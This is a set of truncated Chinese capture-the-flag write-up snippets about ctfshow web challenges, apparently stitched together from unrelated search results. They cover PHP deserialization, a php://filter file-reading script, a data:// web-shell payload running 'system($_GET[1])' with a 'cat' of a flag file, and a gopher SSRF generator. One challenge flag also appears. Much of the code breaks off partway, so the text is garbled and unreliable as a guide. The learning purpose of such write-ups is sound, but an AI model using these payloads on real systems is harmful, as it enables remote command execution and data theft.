easy_unserialize 简单分析可以发现是反序列化,还有ini_set。 发现默认写入setting.inc,写入的内容还要在反序列化一次。 非预期解: 先看ini_set可以设定的值里有一个error_log 这里代表报错信息会写入我们设定的文件里。 那么怎么构造脚本错误呢,这里利用un
easyPytHon_P这道题是给了源码我们分析一下,我们需要传入两个参数 一个 cmd 一个param,后面有个命令执行的函数,所以我们需要构造一个命令,用这两个参数,但是 cmd 是有限制的,只能读取三位,分析完毕,我们开始构造payloadcmd=ls¶m=/ 但是我们传参数始终不对,没有得到我们想要的结果,其实这里又考了flask的传...
start={filename_len}&read={payload}"#注入时的参数,使用前修改returnself.session.get(url=url)defdo->bytes:path=f"php://filter/convert.base64-encode/resource={path}"response=self.send(path)match=response.re.search(b"File contents: (.*)",flags=re.S)ifmatch:data=match.group(1)returnbase6...
简介: CTfshow 卷王杯 easy unserialize(特详) 考点:__destruct函数的GC回收机制、php反序列化的一些冷门知识点源码:<?php class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { ...
easy_php(复现) 题解:https://www.yuque.com/boogipop/tdotcs/hobe2yqmb3kgy1l8,Boogipop师傅tql 代码语言:javascript 代码运行次数:0 运行 AI代码解释 <?php error_reporting(0); highlight_file(__FILE__); class ctfshow{ public function __wakeup(){ die("not allowed!"); } public function __...
主要看他会加上.inc,因此一开始我们写入settings.inc目标php语句 再执行该函数,包含settings.inc payload: 写入 AI检测代码解析 <?phpclasssettings{ }classmain {public$settings;public$params;public$a;public$b;publicfunction __construct() { $this->params=serialize( ...
url后缀名添加/tz.php 版本是雅黑PHP探针,然后查看phpinfo搜索flag web17 hint:备份的sql文件会泄露敏感信息 url/backup.sql INSERT INTO `ctfshow_secret` VALUES ('ctfshow{9836df41-1cee-4473-81a7-cb42a68ee324}'); web18 hint:不要着急,休息,休息一会儿,玩101分给你flag ...
http://2f8afaaf-41c0-440d-83fd-c7d2cf5c0d56.challenge.ctf.show/?1=cat /f1agaaa;file=data://text/plain,<?php system($_GET[1]);?>>?;)]1[TEG_$(metsys php?<,nialp/txet//:atad data伪协议直接用 ?>截断就行 easyPHP
<?php error_reporting(0); include"config.php"; //这句话没啥用跳过 if(isset($_GET['view_source'])) { show_source(__FILE__); die; } // functioncheckCookie($s) { //以:为分隔符将$s分为两部分 $arr=explode(':',$s);
very_easy_sql 这个题目有点奇怪的,开局看注释转到use.php判断SSRF没什么问题,但是好像没人提到是如何发现注入点在cookie的?我猜测应该是看cookie的回显判断出来的= = 收一手别人的gopher格式的python代码: importurllib.parsehost="127.0.0.1:80"content="uname=admin&passwd=admin"content_length=len(content)test=...